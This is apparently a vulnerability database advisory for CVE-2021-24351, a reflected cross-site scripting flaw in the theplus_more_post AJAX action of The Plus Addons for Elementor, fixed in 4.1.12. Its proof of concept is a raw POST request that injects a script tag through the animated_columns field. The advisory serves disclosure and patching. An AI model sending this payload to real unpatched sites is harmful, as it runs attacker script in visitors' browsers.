The Plus Addons for Elementor < 4.1.12 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24351 | Plugin Vulnerabilities

Description

The theplus_more_post AJAX action of the plugin did not properly sanitise some of its fields, leading to a reflected Cross-Site Scripting (exploitable on both unauthenticated and authenticated users)

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 174
Connection: close

action=theplus_more_post&post_type=any&posts_per_page=10&offset=0&display_button=yes&post_load=products&animated_columns=test%22%3e%3cscript%3ealert(%2fXSS%2f)%3c%2fscript%3e

Affects Plugins

theplus_elementor_addon

Fixed in 4.1.12

References

CVE

URL

https://theplusaddons.com/changelog/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Nicolas VERDIER from TEHTRIS

Submitter

Nicolas VERDIER from TEHTRIS

Submitter twitter

Verified

Yes

WPVDB ID

2ee62f85-7aea-4b7d-8b2d-5d86d9fb8016

Timeline

Publicly Published

2021-05-31 (about 2 years ago)

Added

2021-05-31 (about 2 years ago)

Last Updated

2021-06-01 (about 2 years ago)

Other

Published

Title

Published

2023-05-16

Title

WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery

Published

2023-04-05

Title

YourChannel < 1.2.6 - Admin+ Stored XSS

Published

2021-04-13

Title

JetWidgets For Elementor < 1.0.9 - Contributor+ Stored XSS

Published

2021-05-17

Title

Related Posts for WordPress < 2.0.5 - Authenticated Stored XSS & XFS

Published

2023-03-30

Title

WPMobile.App < 11.21 - Admin+ Stored XSS